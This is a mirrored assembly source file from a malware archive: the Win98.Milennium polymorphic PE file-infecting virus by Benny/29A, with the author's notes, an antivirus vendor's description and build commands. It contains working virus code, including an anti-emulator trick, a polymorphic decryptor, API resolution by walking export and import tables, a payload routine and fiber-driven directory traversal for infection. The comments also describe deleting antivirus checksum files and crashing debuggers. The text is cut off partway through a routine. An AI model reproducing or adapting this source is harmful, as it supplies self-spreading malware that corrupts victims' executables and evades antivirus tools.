mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-02 00:15:27 +00:00
1538 lines
44 KiB
NASM
1538 lines
44 KiB
NASM
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>
|
|||
|
; Win98.Milennium <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; by Benny/29A <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;Author's description
|
|||
|
;=====================
|
|||
|
;
|
|||
|
;
|
|||
|
;I'm very proud to introduce first multifiber virus ever. Not only this is
|
|||
|
;also multithreaded polymorphic compressed armoured Win98 PE file infector
|
|||
|
;with structure similar to neural nets. For those ppl, that doesn't know,
|
|||
|
;what fiber is i can say: "There r many differences between threads and
|
|||
|
;fibers, but this one is the most important. Threads r scheduled by
|
|||
|
;specific Operating System's algorihtm, so its in 50% up to OS, which
|
|||
|
;thread will run and which not. Fibers r special threads, that r scheduled
|
|||
|
;ONLY by YOUR algorithm." I will explain all details in my tutorial.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;What happens on execution ?
|
|||
|
;----------------------------
|
|||
|
;
|
|||
|
;Virus will:
|
|||
|
;1) Decrypt it's body by polymorphic decryptor
|
|||
|
;2) Decompress API strings
|
|||
|
;3) Gets module handle of KERNEL32.DLL
|
|||
|
;4) Gets addresses for all needed APIs
|
|||
|
;5) Creates Main thread
|
|||
|
; I) Converts actual thread to fiber
|
|||
|
; II) Creates all needed fibers
|
|||
|
; III) Finds file
|
|||
|
; IV) Chex file
|
|||
|
; V) Infects file
|
|||
|
; VI) Loops III) - V)
|
|||
|
; VII) Deletes TBAV checksum file
|
|||
|
; VIII) Changes directory by dot-dot method
|
|||
|
; IX) Loops III) - VII)
|
|||
|
;
|
|||
|
;6) Chex some flags (=> payload) and jumps to host program.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;Main features
|
|||
|
;--------------
|
|||
|
;
|
|||
|
;Platforms: Win98+, platforms supportin' threads, fibers and "IN" instruction.
|
|||
|
;Residency: Nope, direct action only.
|
|||
|
;Stealth: No due to nonresidency.
|
|||
|
;Antidebuggin': Yes, uses threads, fibers and IsDebuggerPresent API.
|
|||
|
;Antiheuristix: Yes, uses threads, fibers and polymorphic engine.
|
|||
|
;AntiAntiVirus: Yes, deletes TBAV checksum file.
|
|||
|
;Fast infection:Yes, infects all files in directory structure.
|
|||
|
;Polymorphism: Yes.
|
|||
|
;Other features:a) Usin' "Memory-Mapped files".
|
|||
|
; b) No use of absolute addresses.
|
|||
|
; c) The only way, how to detect this virus is check PE header
|
|||
|
; for suspicious flags (new section and flags in last section)
|
|||
|
; or find decryption routine (that's not easy, it's polymorphic).
|
|||
|
; It can't be detected by heuristic analyzer due to use of
|
|||
|
; threads and fibers. AV scanner can't trace all APIs
|
|||
|
; and can't know all of 'em. In this age. I think, this is
|
|||
|
; the best antiheuristic technique.
|
|||
|
; d) Usin' SEH for handlin' expected and unexpected exeptions.
|
|||
|
; e) Infects EXE, SCR, BAK, DAT and SFX (WinRAR) files.
|
|||
|
; f) Two ways, how to infect file: 1) append to last section
|
|||
|
; 2) create new section
|
|||
|
; g) Similar structure to Neural Nets.
|
|||
|
; h) Unicode support for future versions of windozes
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;Payload
|
|||
|
;--------
|
|||
|
;
|
|||
|
;If virus is at least 50th generation of original, it displays
|
|||
|
;in possibility 1:10 MessageBox.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;AVP's description
|
|||
|
;==================
|
|||
|
;
|
|||
|
;This is not a dangerous parasitic Win98 direct action polymorphic virus. It
|
|||
|
;uses several Windows APIs included only in Windows98 and WindowsNT 3.51
|
|||
|
;Service Pack 3 or higher, and will not work under Windows95. Due to
|
|||
|
;infection-related bugs, it also doesn't work under WinNT and Win2000. So it
|
|||
|
;is Win98 specific virus. The infection mechanism used is a very tricky one -
|
|||
|
;- and a very stable under Win98, too. It makes this virus a very fast
|
|||
|
;infector, but several infection related bugs unhide the virus presence in
|
|||
|
;non-Win98 systems. When executed, the virus searches for PE executable files
|
|||
|
;in the current directory and all the upper directories. During infection the
|
|||
|
;virus uses two infection ways: increases the size of last file section for
|
|||
|
;its code, or adds a new section called ".mdata". At each 30 infected file the
|
|||
|
;virus depending on the system timer (in one case of 10) displays the
|
|||
|
;following message box:
|
|||
|
;
|
|||
|
; +---------------------------------------------------+
|
|||
|
; | Win32.Milennium by Benny/29A |
|
|||
|
; +---------------------------------------------------|
|
|||
|
; | First multifiber virus is here, beware of me ;-) |
|
|||
|
; | Click OK if u wanna run this shit..' |
|
|||
|
; +---------------------------------------------------+
|
|||
|
;
|
|||
|
;
|
|||
|
;Technical details
|
|||
|
;------------------
|
|||
|
;
|
|||
|
;When an infected file is executed, the polymorphic routine will decrypt the
|
|||
|
;constant virus body. Next, the virus unpacks the API names using the
|
|||
|
;following scheme: each API name is split in words, each word that appears
|
|||
|
;twice is stored in a dictionary (for example SetFileAttributes and
|
|||
|
;GetFileAttributes APIs are encoded like this:
|
|||
|
;
|
|||
|
;Dictionary: Set, Get, File, Attributes
|
|||
|
;Encoding: 1, 3, 4, 2, 3, 4.
|
|||
|
;
|
|||
|
;Any word that is not in the dictionary is stored "AS IS". After unpacking API
|
|||
|
;names, it gets the addresses for all the used APIs. Then, it creates a thread
|
|||
|
;and waits for it to finnish.
|
|||
|
;
|
|||
|
;
|
|||
|
;The main thread and fibers
|
|||
|
;---------------------------
|
|||
|
;
|
|||
|
;The thread converts itself to a fiber and split the infection process in 7
|
|||
|
;pieces:
|
|||
|
;
|
|||
|
;Fiber 1 - gets the current directory and searches for the following file
|
|||
|
;types: *.EXE, *.SCR, *.BAK, *.DAT, *.SFX. Then it gives control to fiber 3.
|
|||
|
;After receiving back the control, it deletes the file (if any) ANTIVIR.DAT
|
|||
|
;from the current directory and goes to the upper directory.
|
|||
|
;
|
|||
|
;Fiber 2 - checks if the code runs under a debugger and if yes, it makes the
|
|||
|
;stack pointer zero. This will result in a debugger crash.
|
|||
|
;
|
|||
|
;Fiber 3 - gets a file from the current search started in Fiber 1 and calls
|
|||
|
;Fiber 4 to continue. When Fiber4 is completed, it calls Fiber7 and waits to
|
|||
|
;receive back the control. Then it checks for more files in the current
|
|||
|
;directory.
|
|||
|
;
|
|||
|
;Fiber 4 - checks if the file size if less than 4Gb and then gives control to
|
|||
|
;Fiber 5. After Fiber5 completes, it checks it the file is an exe file, if the
|
|||
|
;target processor is Intel and if the file is not a DLL. Also, it pays
|
|||
|
;attention to the Imagebase (only files with ImageBase = 400000h are infected
|
|||
|
; - most applications are infectable from this point of view). Then it gives
|
|||
|
;control to Fiber 6 and waits to receive it back.
|
|||
|
;
|
|||
|
;Fiber 5 - Opens the current file, creates a mapping object for this file to
|
|||
|
;make infection process easier. Next, it calls Fiber6 and sleeps till it gets
|
|||
|
;back the control.
|
|||
|
;
|
|||
|
;Fiber 6 - is closes the current file, restores the file time and date and, if
|
|||
|
;needed, grows the current file to fit the virus code.
|
|||
|
;
|
|||
|
;Fiber 7 - it calls the main infection routine.
|
|||
|
;
|
|||
|
;
|
|||
|
;File infection routine
|
|||
|
;-----------------------
|
|||
|
;
|
|||
|
;When infecting a file, the virus scans its imports for one of the following
|
|||
|
;APIs: GetModuleHandleA and GetModuleHandleW. This will be used by the virus
|
|||
|
;to get the addresses of the APIs needed to spread. If the host file does not
|
|||
|
;import one of the previous APIs, the virus will not infect it. Next, the
|
|||
|
;virus adds its code - there's one chance in three to create a new section,
|
|||
|
;called .mdata. Otherwise, it increases the size of the last section. Then it
|
|||
|
;calls it's polymorphic engine to generate an encrypted image of the virus and
|
|||
|
;the decryptor for it and writes generated code into the host file.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;Author's notes
|
|||
|
;===============
|
|||
|
;
|
|||
|
;Hmmm, fine. Adrian Marinescu made excelent work. Really. I think, he didn't
|
|||
|
;miss any important thing nor any internal detail. Gewd werk Adrian!
|
|||
|
;Nevertheless, there is one thing, I have to note. Adrian made description of
|
|||
|
;beta of Milennium. U can see, that payload writes Win32.Milennium instead
|
|||
|
;Win98. That time I didn't tested it on WinNTs and I expected, it will be
|
|||
|
;Win32 compatible. Unfortunately, I forgot, that IN is privileged opcode under
|
|||
|
;WinNT (that's that bug, Adrian talked about). And after some other
|
|||
|
;corrections (beta deleted ANTIVIR.DAT files instead ANTI-VIR.DAT), I started
|
|||
|
;to call this virus Win98+ compatible. However, Adrians informators (or
|
|||
|
;himself) probably never saw sharp version of Milennium. Hmm, maybe l8r. But
|
|||
|
;this doesn't change anything on thing, that Adrian deeply analysed this virus
|
|||
|
;and that he made really excelent work. I think its all.
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;Greetz
|
|||
|
;=======
|
|||
|
;
|
|||
|
; All 29Aers..... Thank ya for all! I promise, I'll do everything
|
|||
|
; I can ever do for 29A.
|
|||
|
; LethalMnd...... U have a potential, keep workin' on yourself!
|
|||
|
; Yesnah......... Find another dolly, babe :-)).
|
|||
|
; Adrian/GeCAD... Fuck off AV, join 29A! X-D
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;How to build
|
|||
|
;=============
|
|||
|
;
|
|||
|
; tasm32 -ml -q -m4 mil.asm
|
|||
|
; tlink32 -Tpe -c -x -aa -r mil.obj,,, import32
|
|||
|
; pewrsec.com mil.exe
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;For who is this dedicated ?
|
|||
|
;============================
|
|||
|
;
|
|||
|
;This virus is dedicated for somebody. Hehe, surprisely. It's dedicated to all
|
|||
|
;good VXerz (N0T lamerz !!!) with greet, next Milennium will be our.
|
|||
|
;Don't give up !!!
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
;(c) 1999 Benny/29A.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.386p ;386+ intructions
|
|||
|
.model flat ;flat model
|
|||
|
|
|||
|
include MZ.inc ;include some needed files
|
|||
|
include PE.inc
|
|||
|
include Win32API.inc
|
|||
|
include Useful.inc
|
|||
|
|
|||
|
|
|||
|
extrn ExitProcess:PROC ;some APIs needed by first generation
|
|||
|
extrn GetModuleHandleA:PROC
|
|||
|
extrn GetModuleHandleW:PROC
|
|||
|
|
|||
|
|
|||
|
.data
|
|||
|
db ? ;for TLINK32 compatibility
|
|||
|
ends
|
|||
|
|
|||
|
;VIRUS CODE STARTS HERE...
|
|||
|
.code
|
|||
|
Start:
|
|||
|
pushad ;push all regs
|
|||
|
@SEH_SetupFrame ;setup SEH frame
|
|||
|
inc byte ptr [edx] ;===> GP fault
|
|||
|
jmp Start ;some stuff for dumb emulators
|
|||
|
seh_fn: @SEH_RemoveFrame ;remove SEH frame
|
|||
|
popad ;and pop all regs
|
|||
|
;stuff above will fuck AV-emulators
|
|||
|
|
|||
|
push eax ;leave some space for "ret" to host
|
|||
|
pushad ;push all regs
|
|||
|
;POLY DECRYPTOR STARTS HERE...
|
|||
|
@j1: db 3 dup (90h)
|
|||
|
call @j2
|
|||
|
@j2: db 3 dup (90h)
|
|||
|
@1: pop ebp
|
|||
|
@j3: db 3 dup (90h)
|
|||
|
@2: sub ebp, offset @j2
|
|||
|
@j4: db 3 dup (90h)
|
|||
|
; mov ecx, (virus_end-encrypted+3)/4
|
|||
|
@4: db 10111001b
|
|||
|
dd (virus_end-encrypted+3)/4
|
|||
|
@j5: db 3 dup (90h)
|
|||
|
; lea esi, [ebp + encrypted]
|
|||
|
db 10001101b
|
|||
|
@3: db 10110101b
|
|||
|
; regmod
|
|||
|
dd offset encrypted
|
|||
|
@j6: db 3 dup (90h)
|
|||
|
decrypt:
|
|||
|
; xor dword ptr [esi], 0
|
|||
|
db 10000001b
|
|||
|
@7: db 00110110b
|
|||
|
key: dd 0
|
|||
|
@j7: db 3 dup (90h)
|
|||
|
_next_: ; add esi, 4
|
|||
|
db 10000011b
|
|||
|
@8: db 11000110b
|
|||
|
db 4
|
|||
|
@j8: db 3 dup (90h)
|
|||
|
; dec ecx
|
|||
|
@5: db 01001001b
|
|||
|
@j9: db 3 dup (90h)
|
|||
|
; test ecx, ecx
|
|||
|
db 10000101b
|
|||
|
@6: db 11001001b
|
|||
|
jne decrypt
|
|||
|
|
|||
|
encrypted:
|
|||
|
|
|||
|
nFile = 1 ;some constants for decompress stage
|
|||
|
nGet = 2
|
|||
|
nSet = 3
|
|||
|
nModule = 4
|
|||
|
nHandle = 5
|
|||
|
nCreate = 6
|
|||
|
nFind = 7
|
|||
|
nClose = 8
|
|||
|
nViewOf = 9
|
|||
|
nCurrentDirectoryA= 10
|
|||
|
nFiber = 11
|
|||
|
nThread = 12
|
|||
|
nDelete = 13
|
|||
|
nLibrary = 14
|
|||
|
numof_csz = 15 ;number of 'em
|
|||
|
call skip_strings
|
|||
|
|
|||
|
cstringz:
|
|||
|
;module names
|
|||
|
cszKernel32 db 'KERNEL32', 0
|
|||
|
cszKernel32W dw 'K','E','R','N','E','L','3','2', 0
|
|||
|
cszUser32 db 'USER32', 0
|
|||
|
|
|||
|
;compressed API names
|
|||
|
cszGetModuleHandleA db nGet, nModule, nHandle, 'A', 0
|
|||
|
cszGetModuleHandleW db nGet, nModule, nHandle, 'W', 0
|
|||
|
|
|||
|
cszCreateThread db nCreate, nThread, 0
|
|||
|
cszWaitForSingleObject db 'WaitForSingleObject', 0
|
|||
|
cszCloseHandle db nClose, nHandle, 0
|
|||
|
cszConvertThreadToFiber db 'Convert', nThread, 'To', nFiber, 0
|
|||
|
cszCreateFiber db nCreate, nFiber, 0
|
|||
|
cszSwitchToFiber db 'SwitchTo', nFiber, 0
|
|||
|
cszDeleteFiber db nDelete, nFiber, 0
|
|||
|
cszGetVersion db nGet, 'Version', 0
|
|||
|
cszFindFirstFileA db nFind, 'First', nFile, 'A', 0
|
|||
|
cszFindNextFileA db nFind, 'Next', nFile, 'A', 0
|
|||
|
cszFindClose db nFind, nClose, 0
|
|||
|
cszCreateFileA db nCreate, nFile, 'A', 0
|
|||
|
cszCreateFileMappingA db nCreate, nFile, 'MappingA', 0
|
|||
|
cszMapViewOfFile db 'Map', nViewOf, nFile, 0
|
|||
|
cszUnmapViewOfFile db 'Unmap', nViewOf, nFile, 0
|
|||
|
cszSetFileAttributesA db nSet, nFile, 'AttributesA', 0
|
|||
|
cszSetFilePointer db nSet, nFile, 'Pointer', 0
|
|||
|
cszSetEndOfFile db nSet, 'EndOf', nFile, 0
|
|||
|
cszSetFileTime db nSet, nFile, 'Time', 0
|
|||
|
cszGetCurrentDirectoryA db nGet, nCurrentDirectoryA, 0
|
|||
|
cszSetCurrentDirectoryA db nSet, nCurrentDirectoryA, 0
|
|||
|
cszDeleteFile db nDelete, nFile, 'A', 0
|
|||
|
cszLoadLibraryA db 'Load', nLibrary, 'A', 0
|
|||
|
cszFreeLibraryA db 'Free', nLibrary, 0
|
|||
|
cszIsDebuggerPresent db 'IsDebuggerPresent', 0
|
|||
|
db 0ffh
|
|||
|
szMessageBoxA db 'MessageBoxA', 0
|
|||
|
|
|||
|
;strings for payload
|
|||
|
szTitle db 'Win98.Milennium by Benny/29A', 0
|
|||
|
|
|||
|
szText db 'First multifiber virus is here, beware of me ! ;-)', 0dh
|
|||
|
db 'Click OK if u wanna run this shit...', 0
|
|||
|
skip_strings:
|
|||
|
pop esi ;get relative delta offset
|
|||
|
mov ebp, esi
|
|||
|
sub ebp, offset cstringz
|
|||
|
lea edi, [ebp + strings]
|
|||
|
|
|||
|
next_ch:lodsb ;decompressing stage
|
|||
|
test al, al
|
|||
|
je copy_b
|
|||
|
cmp al, 0ffh
|
|||
|
je end_unpacking
|
|||
|
cmp al, numof_csz
|
|||
|
jb packed
|
|||
|
copy_b: stosb
|
|||
|
jmp next_ch
|
|||
|
packed: push esi
|
|||
|
lea esi, [ebp + string_subs]
|
|||
|
mov cl, 1
|
|||
|
mov dl, al
|
|||
|
lodsb
|
|||
|
packed2:test al, al
|
|||
|
je _inc_
|
|||
|
packed3:cmp cl, dl
|
|||
|
jne un_pck
|
|||
|
p_cpy: stosb
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jne p_cpy
|
|||
|
pop esi
|
|||
|
jmp next_ch
|
|||
|
un_pck: lodsb
|
|||
|
test al, al
|
|||
|
jne packed3
|
|||
|
_inc_: inc ecx
|
|||
|
jmp un_pck
|
|||
|
|
|||
|
end_unpacking:
|
|||
|
stosb ;store 0ffh byte
|
|||
|
mov ecx, offset _GetModuleHandleA - 400000h ;some params
|
|||
|
GMHA = dword ptr $ - 4
|
|||
|
mov ebx, offset _GetModuleHandleW - 400000h
|
|||
|
GMHW = dword ptr $ - 4
|
|||
|
lea edx, [ebp + szKernel32]
|
|||
|
lea esi, [ebp + szKernel32W]
|
|||
|
call MyGetModuleHandle ;pseudo-neuron
|
|||
|
jecxz error
|
|||
|
|
|||
|
xchg ebx, ecx
|
|||
|
lea esi, [ebp + szAPIs] ;params for next
|
|||
|
lea edi, [ebp + ddAPIs]
|
|||
|
call MyGetProcAddress ;pseudo-neuron
|
|||
|
jecxz error
|
|||
|
|
|||
|
xor eax, eax
|
|||
|
lea edx, [ebp + dwThreadID]
|
|||
|
push edx
|
|||
|
push eax
|
|||
|
push ebp
|
|||
|
lea edx, [ebp + MainThread]
|
|||
|
push edx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
call [ebp + ddCreateThread] ;create main thread
|
|||
|
|
|||
|
mov ebx, eax ;wait for
|
|||
|
xor eax, eax ;thread
|
|||
|
dec eax ;signalization
|
|||
|
push eax
|
|||
|
push ebx
|
|||
|
call [ebp + ddWaitForSingleObject] ;...
|
|||
|
|
|||
|
push ebx ;and close handle
|
|||
|
call [ebp + ddCloseHandle] ;of main thread
|
|||
|
|
|||
|
call payload ;try payload
|
|||
|
error: mov eax, [ebp + Entrypoint]
|
|||
|
add eax, 400000h
|
|||
|
mov [esp.cPushad], eax
|
|||
|
popad
|
|||
|
ret ;and jump to host
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
payload:
|
|||
|
cmp byte ptr [ebp + GenerationCount], 30 ;30th generation ?
|
|||
|
jne end_payload ;nope
|
|||
|
|
|||
|
in al, 40h
|
|||
|
and al, 9d
|
|||
|
jne end_payload ;chance 1:10
|
|||
|
|
|||
|
lea edx, [ebp + szUser32] ;yup, load library
|
|||
|
push edx ;(USER32.DLL)
|
|||
|
call [ebp + ddLoadLibraryA]
|
|||
|
xchg eax, ecx
|
|||
|
jecxz end_payload
|
|||
|
xchg ecx, ebx
|
|||
|
|
|||
|
lea esi, [ebp + szMessageBoxA] ;get address of
|
|||
|
call GetProcAddress ;MessageBoxA API
|
|||
|
xchg eax, ecx ;error ?
|
|||
|
jecxz end_payload ;...
|
|||
|
|
|||
|
push 1000h ;pass params
|
|||
|
lea edx, [ebp + szTitle]
|
|||
|
push edx
|
|||
|
lea edx, [ebp + szText]
|
|||
|
push edx
|
|||
|
push 0
|
|||
|
call ecx ;call API
|
|||
|
push ebx
|
|||
|
call [ebp + ddFreeLibraryA] ;and unload library
|
|||
|
|
|||
|
end_payload:
|
|||
|
ret
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
MyGetModuleHandle Proc ;our GetModuleHandle function
|
|||
|
jecxz try_GMHW ;try Unicode version
|
|||
|
mov edi, 400000h
|
|||
|
push edx
|
|||
|
_GMH_: add ecx, edi
|
|||
|
call [ecx]
|
|||
|
xchg eax, ecx
|
|||
|
er_GMH: ret
|
|||
|
try_GMHW: ;Unicode version
|
|||
|
mov ecx, ebx
|
|||
|
jecxz er_GMH
|
|||
|
push esi
|
|||
|
jmp _GMH_
|
|||
|
MyGetModuleHandle EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
MyGetProcAddress Proc ;our GetProcAddress function
|
|||
|
call GetProcAddress
|
|||
|
test eax, eax ;error ?
|
|||
|
je er_GPA
|
|||
|
stosd ;store address
|
|||
|
@endsz ;get next API name
|
|||
|
cmp byte ptr [esi], 0ffh ;end of API names ?
|
|||
|
jne MyGetProcAddress ;no, next API
|
|||
|
ret ;yeah, quit
|
|||
|
er_GPA: xor ecx, ecx
|
|||
|
ret
|
|||
|
GetProcAddress:
|
|||
|
pushad
|
|||
|
@SEH_SetupFrame
|
|||
|
mov eax, ebx
|
|||
|
add eax, [eax.MZ_lfanew]
|
|||
|
mov ecx, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_Size]
|
|||
|
jecxz Proc_Address_not_found
|
|||
|
mov ebp, ebx
|
|||
|
add ebp, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
|
|||
|
push ecx
|
|||
|
mov edx, ebx
|
|||
|
add edx, [ebp.ED_AddressOfNames]
|
|||
|
mov ecx, [ebp.ED_NumberOfNames]
|
|||
|
xor eax, eax
|
|||
|
Search_for_API_name:
|
|||
|
mov edi, [esp + 16]
|
|||
|
mov esi, ebx
|
|||
|
add esi, [edx + eax * 4]
|
|||
|
Next_Char_in_API_name:
|
|||
|
cmpsb
|
|||
|
jz Matched_char_in_API_name
|
|||
|
inc eax
|
|||
|
loop Search_for_API_name
|
|||
|
pop eax
|
|||
|
Proc_Address_not_found:
|
|||
|
xor eax, eax
|
|||
|
jmp end_GetProcAddress
|
|||
|
Matched_char_in_API_name:
|
|||
|
cmp byte ptr [esi-1], 0
|
|||
|
jne Next_Char_in_API_name
|
|||
|
pop ecx
|
|||
|
mov edx, ebx
|
|||
|
add edx, [ebp.ED_AddressOfOrdinals]
|
|||
|
movzx eax, word ptr [edx + eax * 2]
|
|||
|
Check_Index:
|
|||
|
cmp eax, [ebp.ED_NumberOfFunctions]
|
|||
|
jae Proc_Address_not_found
|
|||
|
mov edx, ebx
|
|||
|
add edx, [ebp.ED_AddressOfFunctions]
|
|||
|
add ebx, [edx + eax * 4]
|
|||
|
mov eax, ebx
|
|||
|
sub ebx, ebp
|
|||
|
cmp ebx, ecx
|
|||
|
jb Proc_Address_not_found
|
|||
|
end_GetProcAddress:
|
|||
|
@SEH_RemoveFrame
|
|||
|
mov [esp.Pushad_eax], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
MyGetProcAddress EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
GetProcAddressIT proc ;inputs: EAX - API name
|
|||
|
; ECX - lptr to MZ header
|
|||
|
; EDX - module name
|
|||
|
;outputs: EAX - RVA pointer to IAT, 0 if error
|
|||
|
pushad
|
|||
|
xor eax, eax
|
|||
|
push ebp
|
|||
|
mov esi, [ecx.MZ_lfanew]
|
|||
|
add esi, ecx
|
|||
|
mov eax, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress]
|
|||
|
mov ebp, ecx
|
|||
|
push ecx
|
|||
|
movzx ecx, word ptr [esi.NT_FileHeader.FH_NumberOfSections]
|
|||
|
movzx ebx, word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
|
|||
|
lea ebx, [esi.NT_OptionalHeader + ebx]
|
|||
|
scan_sections:
|
|||
|
mov edx, [ebx.SH_VirtualAddress]
|
|||
|
cmp edx, eax
|
|||
|
je section_found
|
|||
|
sub ebx, -IMAGE_SIZEOF_SECTION_HEADER
|
|||
|
loop scan_sections
|
|||
|
pop ecx
|
|||
|
pop eax
|
|||
|
jmp End_GetProcAddressIT2
|
|||
|
section_found:
|
|||
|
mov ebx, [ebx + 20]
|
|||
|
add ebx, ebp
|
|||
|
pop ecx
|
|||
|
pop eax
|
|||
|
test ebx, ebx
|
|||
|
je End_GetProcAddressIT2
|
|||
|
xor esi, esi
|
|||
|
xor ebp, ebp
|
|||
|
push esi
|
|||
|
dec ebp
|
|||
|
Get_DLL_Name:
|
|||
|
pop esi
|
|||
|
inc ebp
|
|||
|
mov edi, [esp + 20]
|
|||
|
mov ecx, [ebx.esi.ID_Name]
|
|||
|
test ecx, ecx
|
|||
|
je End_GetProcAddressIT2
|
|||
|
sub ecx, edx
|
|||
|
sub esi, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR
|
|||
|
push esi
|
|||
|
lea esi, [ebx + ecx]
|
|||
|
Next_Char_from_DLL:
|
|||
|
lodsb
|
|||
|
add al, -'.'
|
|||
|
jz IT_nup
|
|||
|
sub al, -'.' + 'a'
|
|||
|
cmp al, 'z' - 'a' + 1
|
|||
|
jae no_up
|
|||
|
add al, -20h
|
|||
|
no_up: sub al, -'a'
|
|||
|
IT_nup: scasb
|
|||
|
jne Get_DLL_Name
|
|||
|
cmp byte ptr [edi-1], 0
|
|||
|
jne Next_Char_from_DLL
|
|||
|
Found_DLL_Name:
|
|||
|
pop esi
|
|||
|
imul eax, ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
|
|||
|
mov ecx, [ebx + eax.ID_OriginalFirstThunk]
|
|||
|
jecxz End_GetProcAddressIT2
|
|||
|
sub ecx, edx
|
|||
|
add ecx, ebx
|
|||
|
xor esi, esi
|
|||
|
Next_Imported_Name:
|
|||
|
push esi
|
|||
|
mov edi, [esp + 32]
|
|||
|
mov esi, [ecx + esi]
|
|||
|
test esi, esi
|
|||
|
je End_GetProcAddressIT3
|
|||
|
sub esi, edx
|
|||
|
add esi, ebx
|
|||
|
lodsw
|
|||
|
next_char:
|
|||
|
cmpsb
|
|||
|
jne next_step
|
|||
|
cmp byte ptr [esi-1], 0
|
|||
|
je got_it
|
|||
|
jmp next_char
|
|||
|
next_step:
|
|||
|
pop esi
|
|||
|
sub esi, -4
|
|||
|
jmp Next_Imported_Name
|
|||
|
got_it: pop esi
|
|||
|
imul ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
|
|||
|
add ebx, ebp
|
|||
|
mov eax, [ebx.ID_FirstThunk]
|
|||
|
add eax, esi
|
|||
|
mov [esp + 28], eax
|
|||
|
jmp End_GetProcAddressIT
|
|||
|
End_GetProcAddressIT3:
|
|||
|
pop eax
|
|||
|
End_GetProcAddressIT2:
|
|||
|
n6: xor eax, eax
|
|||
|
mov [esp.Pushad_eax], eax
|
|||
|
End_GetProcAddressIT:
|
|||
|
popad
|
|||
|
ret
|
|||
|
GetProcAddressIT EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
; NOTE: Dendrit = Input, Axon = output, Synapse = jump link
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
MainThread Proc PASCAL delta_param:DWORD ;delta offset as dendrit
|
|||
|
pushad ;store all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
|
|||
|
push 0
|
|||
|
call [ebx + ddConvertThreadToFiber] ;convert thread to fiber
|
|||
|
xchg eax, ecx
|
|||
|
jecxz exit_main ;error ?
|
|||
|
mov [ebx + pfMain], ecx ;store context
|
|||
|
|
|||
|
lea esi, [ebx + Neuron_Addresses] ;create all needed fibers
|
|||
|
lea edi, [ebx + Fiber_Addresses+4]
|
|||
|
mov ecx, num_of_neurons
|
|||
|
init_neurons:
|
|||
|
lodsd
|
|||
|
push ecx
|
|||
|
push ebx
|
|||
|
add eax, ebx
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
call [ebx + ddCreateFiber] ;create fiber
|
|||
|
pop ecx
|
|||
|
test eax, eax
|
|||
|
je exit_main
|
|||
|
stosd
|
|||
|
loop init_neurons
|
|||
|
|
|||
|
push [ebx + pfNeuron_Main]
|
|||
|
call [ebx + ddSwitchToFiber] ;switch to main neuron
|
|||
|
|
|||
|
exit_main:
|
|||
|
popad
|
|||
|
ret
|
|||
|
MainThread EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_Main Proc PASCAL delta_param:DWORD ;delta offset as dendrit
|
|||
|
pushad ;store all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
|
|||
|
push [ebx + pfNeuron_Debugger]
|
|||
|
call [ebx + ddSwitchToFiber] ;dwitch to neuron
|
|||
|
|
|||
|
lea edx, [ebx + CurDir]
|
|||
|
push edx
|
|||
|
push MAX_PATH
|
|||
|
call [ebx + ddGetCurrentDirectoryA] ;store current directory
|
|||
|
|
|||
|
mov ecx, 20
|
|||
|
path_walk:
|
|||
|
push ecx
|
|||
|
lea esi, [ebx + szExe] ;extension
|
|||
|
mov ecx, num_of_exts
|
|||
|
process_dir:
|
|||
|
push ecx
|
|||
|
mov [ebx + nfindfile_name], esi ;dendrit
|
|||
|
mov [ebx + nFF_synapse], offset pfNeuron_Main ;build synapse
|
|||
|
push [ebx + pfNeuron_FindFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;infect directory
|
|||
|
@endsz
|
|||
|
pop ecx
|
|||
|
